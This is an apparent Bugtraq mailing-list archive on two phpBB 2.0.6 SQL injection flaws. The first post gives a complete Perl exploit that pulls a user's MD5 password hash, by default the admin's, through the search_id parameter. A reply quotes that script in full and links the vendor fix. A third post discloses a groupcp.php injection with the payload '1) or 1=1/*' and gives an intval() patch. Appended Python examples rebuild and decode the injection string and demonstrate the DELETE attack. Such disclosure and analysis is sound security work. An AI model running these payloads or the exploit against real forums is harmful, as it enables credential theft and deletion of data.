11126036 2003-12-21 02:00 +0300 /68 lines/ "f3sy1 f3sy1" <f3sy1@mail.ru>
Imported: 2003-12-21 00:15 by Brevbäraren
External recipient: bugtraq@securityfocus.com
External replies to: f3sy1@mail.ru
Recipient: Bugtraq (import) <30438>
Subject: phpBB v2.06 search_id sql injection exploit
------------------------------------------------------------
From: "f3sy1 f3sy1" <f3sy1@mail.ru>
To: bugtraq@securityfocus.com
Message-ID: <E1AXq5i-000JG8-00.f3sy1-mail-ru@f7.mail.ru>

#!/usr/bin/perl -w
use strict;
use IO::Socket;
##    PROOF-OF-CONCEPT
##    * works only with MySQL > 4.0 (UNION SELECT needs 4.0 or later)
##    * works only with post #1
##
##    Example:
##    C:\>r57phpbb-poc.pl 127.0.0.1 phpBB2 2 2
##    [~] prepare to connect...
##    [+] connected
##    [~] prepare to send data...
##    [+] OK
##    [~] wait for response...
##    [+] MD5 Hash for user with id=2 is: 5f4dcc3b5aa765d61d8327deb882cf99
##
if (@ARGV < 4)
{
    print "\n\n";
    print "|****************************************************************|\n";
    print " r57phpbb.pl\n";
    print " phpBB v<=2.06 search_id sql injection exploit (POC version)\n";
    print " by RusH security team // www.rsteam.ru , http://rst.void.ru\n";
    print " coded by f3sy1 & 1dt.w0lf // 16/12/2003\n";
    print " Usage: r57phpbb-poc.pl <server> <folder> <user_id> <search_id>\n";
    print " e.g.: r57phpbb-poc.pl 127.0.0.1 phpBB2 2 2\n";
    print " [~] <server> - server ip\n";
    print " [~] <folder> - forum folder\n";
    print " [~] <user_id> - user id (2 default for phpBB admin)\n";
    print " [~] <search_id> - play with this value for results\n";
    print "|****************************************************************|\n";
    print "\n\n";
    exit(1);
}
my $success = 0;
my ($server, $folder, $user_id, $search_id) = @ARGV;
print "[~] prepare to connect...\n";
my $socket = IO::Socket::INET->new(
    Proto    => "tcp",
    PeerAddr => $server,
    PeerPort => 80) || die "[-] connect to $server:80 failed: $!";
print "[+] connected\n";
print "[~] prepare to send data...\n";
# PROOF-OF-CONCEPT request.
# The two char(...) lists are the halves of a serialized PHP array,
#   a:7:{s:14:"search_results";s:1:"1";s:17:"total_match_count";i:5;
#        s:12:"split_search";a:1:{i:0;s:32:"<user_password>";}
#        s:7:"sort_by";i:0;s:8:"sort_dir";s:4:"DESC";
#        s:12:"show_results";s:6:"topics";s:12:"return_chars";i:200;}
# with the user_password column concatenated in as split_search[0]. The forum
# unserializes the row it gets back for this search_id and puts the search
# words into the "highlight=" parameter of the result links, which is where
# the hash is read from below. char() keeps quote characters out of the
# request, and the trailing /* comments out the rest of the original query.
print $socket "GET /$folder/search.php?search_id=$search_id%20union%20select%20concat(char(97,58,55,58,123,115,58,49,52,58,34,115,101,97,114,99,104,95,114,101,115,117,108,116,115,34,59,115,58,49,58,34,49,34,59,115,58,49,55,58,34,116,111,116,97,108,95,109,97,116,99,104,95,99,111,117,110,116,34,59,105,58,53,59,115,58,49,50,58,34,115,112,108,105,116,95,115,101,97,114,99,104,34,59,97,58,49,58,123,105,58,48,59,115,58,51,50,58,34),user_password,char(34,59,125,115,58,55,58,34,115,111,114,116,95,98,121,34,59,105,58,48,59,115,58,56,58,34,115,111,114,116,95,100,105,114,34,59,115,58,52,58,34,68,69,83,67,34,59,115,58,49,50,58,34,115,104,111,119,95,114,101,115,117,108,116,115,34,59,115,58,54,58,34,116,111,112,105,99,115,34,59,115,58,49,50,58,34,114,101,116,117,114,110,95,99,104,97,114,115,34,59,105,58,50,48,48,59,125))%20from%20phpbb_users%20where%20user_id=$user_id/* HTTP/1.0\r\n\r\n";
print "[+] OK\n";
print "[~] wait for response...\n";
while (my $answer = <$socket>)
{
    # the injected hash comes back as the highlight= value of a result link
    if ($answer =~ /;highlight=/)
    {
        $success = 1;
        my @result  = split(/;/, $answer);
        my @result2 = split(/=/, $result[1]);
        $result2[1] =~ s/&/ /g;
        print "[+] MD5 Hash for user with id=$user_id is: $result2[1]\n";
    }
}
if ($success == 0) { print "[-] exploit failed =(\n"; }
## o---[ RusH security team | www.rsteam.ru | 2003 ]---o
(11126036) /"f3sy1 f3sy1" <f3sy1@mail.ru>/
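What the two char(...) lists in the request above actually carry, as an added example in Python (not part of the original post and not phpBB code): a minimal PHP serialize() for the types involved, the forged search array with the password hash as split_search[0], the char() encoding that keeps quote characters out of the URL, and the hash extraction the script does with split(). The phpbb_users/user_password names, the 32-character hash and the 5f4dcc3b... value come from the script; the serializer, the SAMPLE_RESPONSE line and the regex extractor are assumptions of this example, as is the reading that phpBB reflects split_search into the highlight= parameter.

```python
import re

# Stand-in for the 32-character MD5 that phpBB 2.0 keeps in user_password
# (assumption: the column holds a plain md5 hex digest, as the script's output implies).
HASH_PLACEHOLDER = 'X' * 32

def php_serialize(value):
    """Minimal PHP serialize() for the types phpBB's search array uses
    (int, str, list, dict). Written for this example; not a general implementation."""
    if isinstance(value, int):
        return f'i:{value};'
    if isinstance(value, str):
        return f's:{len(value.encode("latin-1"))}:"{value}";'
    if isinstance(value, list):
        value = dict(enumerate(value))
    if isinstance(value, dict):
        body = ''.join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return f'a:{len(value)}:{{{body}}}'
    raise TypeError(f'unsupported type {type(value).__name__}')

def forged_search_array(word):
    """The cached search array the exploit returns through the UNION, with `word`
    as the only search term; phpBB unserializes it and reflects split_search[0]
    into the highlight= parameter of every result link (assumed behaviour)."""
    return php_serialize({
        'search_results': '1',
        'total_match_count': 5,
        'split_search': [word],
        'sort_by': 0,
        'sort_dir': 'DESC',
        'show_results': 'topics',
        'return_chars': 200,
    })

def mysql_char(text):
    """Encode text as MySQL char(...) so the request contains no quote characters
    (which addslashes()/magic_quotes_gpc would otherwise escape)."""
    return 'char(' + ','.join(str(b) for b in text.encode('latin-1')) + ')'

def build_injection(search_id, user_id):
    """Rebuild the search_id value the script sends: the serialized array split
    around the hash, with the user_password column concatenated in between."""
    prefix, suffix = forged_search_array(HASH_PLACEHOLDER).split(HASH_PLACEHOLDER)
    return (f'{search_id} union select concat({mysql_char(prefix)},user_password,'
            f'{mysql_char(suffix)}) from phpbb_users where user_id={user_id}/*')

def decode_injection(injection):
    """Recover the plain text of every char(...) list in an injection string."""
    return [''.join(chr(int(n)) for n in nums.split(','))
            for nums in re.findall(r'char\(([\d,]+)\)', injection)]

HASH_RE = re.compile(r'highlight=([0-9a-f]{32})')

def extract_hash(response):
    """The script splits the matching line on ';' and '='; matching the 32 hex
    digits directly avoids the trailing '&amp' that split leaves behind."""
    m = HASH_RE.search(response)
    return m.group(1) if m else None

# Constructed result line (not captured from a real forum); the hash is the one
# from the script's example output, md5("password").
SAMPLE_RESPONSE = ('<a href="viewtopic.php?t=1&amp;highlight='
                   '5f4dcc3b5aa765d61d8327deb882cf99&amp;sid=0abc" class="topictitle">')

if __name__ == '__main__':
    injection = build_injection(2, 2)
    print('search_id=' + injection.replace(' ', '%20'))
    for half in decode_injection(injection):
        print('  char() decodes to:', half)
    print('hash in response:', extract_hash(SAMPLE_RESPONSE))
```

The first char() list produced by build_injection(2, 2) starts with 97,58,55,58,123 exactly as in the script; decoding both lists shows the a:7:{...} array with the 32-byte string slot where user_password lands. The UNION works because the original query selects a single column (the cached search_array) by search_id, and the trailing /* drops whatever condition followed it.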
11134552 2003-12-23 12:39 -0500 /99 lines/ Micheal Cottingham <micheal@michealcottingham.com>
Imported: 2003-12-23 22:42 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <30452>
Subject: Re: phpBB v2.06 search_id sql injection exploit
------------------------------------------------------------
From: Micheal Cottingham <micheal@michealcottingham.com>
To: bugtraq@securityfocus.com
Message-ID: <3FE87DE2.5060805@michealcottingham.com>

It'd be nice if people would actually check the software site first
for fixes ... http://www.phpbb.com/phpBB/viewtopic.php?t=153818 All
you need to know is there.

International Veneer Co., Inc. wrote:

>----- Original Message ----- 
>From: "f3sy1 f3sy1" <f3sy1@mail.ru>
>To: <bugtraq@securityfocus.com>
>Sent: Saturday, December 20, 2003 6:00 PM
>Subject: phpBB v2.06 search_id sql injection exploit
>
>
>#!/usr/bin/perl -w
>use IO::Socket;
>##    PROOF-OF-CONCEPT
>##    * work only with mysql ver > 4.0
>##    * work only with post #1
>##
>##    Example:
>##    C:\>r57phpbb-poc.pl 127.0.0.1 phpBB2 2 2
>##    [~] prepare to connect...
>##    [+] connected
>##    [~] prepare to send data...
>##    [+] OK
>##    [~] wait for response...
>##    [+] MD5 Hash for user with id=2 is: 5f4dcc3b5aa765d61d8327deb882cf99
>##
>if (@ARGV < 4)
>{
>print "\n\n";
>print
>"|****************************************************************|\n";
>print " r57phpbb.pl\n";
>print " phpBB v<=2.06 search_id sql injection exploit (POC version)\n";
>print " by RusH security team // www.rsteam.ru , http://rst.void.ru\n";
>print " coded by f3sy1 & 1dt.w0lf // 16/12/2003\n";
>print " Usage: r57phpbb-poc.pl <server> <folder> <user_id> <search_id>\n";
>print " e.g.: r57phpbb-poc.pl 127.0.0.1 phpBB2 2 2\n";
>print " [~] <server> - server ip\n";
>print " [~] <folder> - forum folder\n";
>print " [~] <user_id> - user id (2 default for phpBB admin)\n";
>print " [~] <search_id> - play with this value for results\n";
>print
>"|****************************************************************|\n";
>print "\n\n";
>exit(1);
>}
>$success = 0;
>$server = $ARGV[0];
>$folder = $ARGV[1];
>$user_id = $ARGV[2];
>$search_id = $ARGV[3];
>print "[~] prepare to connect...\n";
>$socket = IO::Socket::INET->new(
>Proto => "tcp",
>PeerAddr => "$server",
>PeerPort => "80") || die "$socket error $!";
>print "[+] connected\n";
>print "[~] prepare to send data...\n";
># PROOF-OF-CONCEPT reguest...
>print $socket "GET
>/$folder/search.php?search_id=$search_id%20union%20select%20concat(char(97,5
>8,55,58,123,115,58,49,52,58,34,115,101,97,114,99,104,95,114,101,115,117,108,
>116,115,34,59,115,58,49,58,34,49,34,59,115,58,49,55,58,34,116,111,116,97,108
>,95,109,97,116,99,104,95,99,111,117,110,116,34,59,105,58,53,59,115,58,49,50,
>58,34,115,112,108,105,116,95,115,101,97,114,99,104,34,59,97,58,49,58,123,105
>,58,48,59,115,58,51,50,58,34),user_password,char(34,59,125,115,58,55,58,34,1
>15,111,114,116,95,98,121,34,59,105,58,48,59,115,58,56,58,34,115,111,114,116,
>95,100,105,114,34,59,115,58,52,58,34,68,69,83,67,34,59,115,58,49,50,58,34,11
>5,104,111,119,95,114,101,115,117,108,116,115,34,59,115,58,54,58,34,116,111,1
>12,105,99,115,34,59,115,58,49,50,58,34,114,101,116,117,114,110,95,99,104,97,
>114,115,34,59,105,58,50,48,48,59,125))%20from%20phpbb_users%20where%20user_i
>d=$user_id/* HTTP/1.0\r\n\r\n";
>print "[+] OK\n";
>print "[~] wait for response...\n";
>while ($answer = <$socket>)
>{
>if ($answer =~ /;highlight=/)
>{
>$success = 1;
>@result=split(/;/,$answer);
>@result2=split(/=/,$result[1]);
>$result2[1]=~s/&/ /g;
>print "[+] MD5 Hash for user with id=$user_id is: $result2[1]\n";
>}
>}
>if ($success==0) {print "[-] exploit failed =(\n";}
>## o---[ RusH security team | www.rsteam.ru | 2003 ]---o
(11134552) /Micheal Cottingham <micheal@michealcottingham.com>/(Rewrapped)
11148687 2003-12-29 14:08 +0000 /57 lines/ Jay Gates <zarath@knightsofchaos.com>
Imported: 2003-12-29 23:03 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <30474>
Subject: SQL Injection in phpBB's groupcp.php
------------------------------------------------------------
From: Jay Gates <zarath@knightsofchaos.com>
To: bugtraq@securityfocus.com
Message-ID: <20031229140837.22540.qmail@sf-www2-symnsj.securityfocus.com>



BugTraq,

I have found an SQL injection vulnerability in phpBB. However, I don't
think this is going to be a widespread problem as it will only
work if you are the moderator of a group.

How the SQL injection works:

In groupcp.php, it uses an array set to delete members from certain
groups. This array set is sent through a quick loop to put all the
values into a variable separated by commas and then used in an IN check
in the SQL query to delete the members that you've selected.  Code:

$members = ( isset($HTTP_POST_VARS['approve']) || isset($HTTP_POST_VARS['deny']) )
	? $HTTP_POST_VARS['pending_members'] : $HTTP_POST_VARS['members'];

$sql_in = '';
for($i = 0; $i < count($members); $i++)
{
	$sql_in .= ( ( $sql_in != '' ) ? ', ' : '' ) . $members[$i];
}

After this the $sql_in variable is not checked or changed at all, and
this is where I found the SQL injection to be possible... There are
two places this is used. The first is through a check on whether you're
the moderator of a group; if you are, it will run an IN check on the
array first:

$sql = "SELECT ug.user_id, ug.group_id 
	FROM " . AUTH_ACCESS_TABLE . " aa, " . USER_GROUP_TABLE . " ug 
	WHERE ug.user_id IN  ($sql_in) 
	AND aa.group_id = ug.group_id 
	AND aa.auth_mod = 1 
	GROUP BY ug.user_id, ug.group_id 
	ORDER BY ug.user_id, ug.group_id";

From this, it will pull a list of the users in the group and if
they're moderators from being in the group... If they are, it will
remove their securities.

Now the second one becomes more critical, this is after the check on
if moderator:

$sql = "DELETE FROM " . USER_GROUP_TABLE . " 
	WHERE user_id IN ($sql_in) 
	AND group_id = $group_id";

Since this again uses an IN check on the unchecked $sql_in, you can
easily replace it with something such as $sql_in = 1) or 1=1/*
That would cause every person in a group to be automatically deleted
from it.

To fix this vulnerability, it's fairly simple. Open your groupcp.php
file.  Find

$sql_in .= ( ( $sql_in != '' ) ? ', ' : '' ) . $members[$i];

and replace it with

$sql_in .= ( ( $sql_in != '' ) ? ', ' : '' ) . intval($members[$i]);


I'm providing no proof of concept code because you can easily check
if you're vulnerable by searching for the first line in your
groupcp.php file.

Thanks,
  Zarath
(11148687) /Jay Gates <zarath@knightsofchaos.com>/(Rewrapped)
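The effect of the unchecked IN list and of the intval() fix, as an added example in Python with an in-memory SQLite table standing in for phpBB's user-group table (not code from phpBB or from the poster). Assumptions of the example: a table with user_id and group_id columns, a $group_id that is already an integer, constructed sample rows, and a php_intval() that mimics PHP intval() on string input (leading integer prefix, else 0).

```python
import re
import sqlite3

# Constructed sample rows for a stand-in phpbb_user_group table
# (assumption: user_id / group_id columns as in phpBB 2.0.x).
SAMPLE_ROWS = [
    (2, 5), (3, 5), (4, 5), (7, 5),   # four members of group 5
    (2, 9), (3, 9),                   # two members of group 9, must survive
]

def php_intval(value):
    """Approximate PHP intval() on a string: leading integer prefix, else 0.
    intval('1) or 1=1/*') is 1, which is why the one-line fix is enough."""
    m = re.match(r'\s*([+-]?\d+)', str(value))
    return int(m.group(1)) if m else 0

def build_sql_in(members, patched):
    """The groupcp.php loop that joins the posted member IDs with ', '.
    patched=False is the 2.0.6 code; patched=True applies intval()."""
    sql_in = ''
    for member in members:
        value = str(php_intval(member)) if patched else str(member)
        sql_in += (', ' if sql_in != '' else '') + value
    return sql_in

def fresh_db():
    db = sqlite3.connect(':memory:')
    db.execute('CREATE TABLE phpbb_user_group (user_id INTEGER, group_id INTEGER)')
    db.executemany('INSERT INTO phpbb_user_group VALUES (?, ?)', SAMPLE_ROWS)
    return db

def delete_members(db, members, group_id, patched):
    """Issue the DELETE the way groupcp.php interpolates it; returns the SQL
    so the caller can see what the database actually parsed."""
    sql = (f'DELETE FROM phpbb_user_group WHERE user_id IN ({build_sql_in(members, patched)}) '
           f'AND group_id = {int(group_id)}')
    db.execute(sql)
    db.commit()
    return sql

def members_of(db, group_id):
    rows = db.execute('SELECT user_id FROM phpbb_user_group WHERE group_id = ? '
                      'ORDER BY user_id', (group_id,))
    return [r[0] for r in rows]

def run(members, patched):
    """Apply one POST of member IDs to a fresh table for group 5;
    return (sql sent, members left in group 5, members left in group 9)."""
    db = fresh_db()
    sql = delete_members(db, members, 5, patched)
    return sql, members_of(db, 5), members_of(db, 9)

if __name__ == '__main__':
    cases = ((['3', '7'], False),           # the intended use
             (['1) or 1=1/*'], False),      # the poster's payload, unpatched
             (['1) or 1=1/*'], True))       # same payload after intval()
    for members, patched in cases:
        sql, g5, g9 = run(members, patched)
        print(('patched  ' if patched else 'original ') + sql)
        print('   group 5 ->', g5, ' group 9 ->', g9)
```

With the unpatched loop the statement the database sees ends in `IN (1) or 1=1/*) AND group_id = 5`: the comment swallows the group_id condition, and the OR empties every group, not just the one being moderated. After intval() the same POST becomes `IN (1) AND group_id = 5` and touches nothing. SQLite and MySQL both treat an unterminated /* as a comment to end of input, so the demonstration carries over.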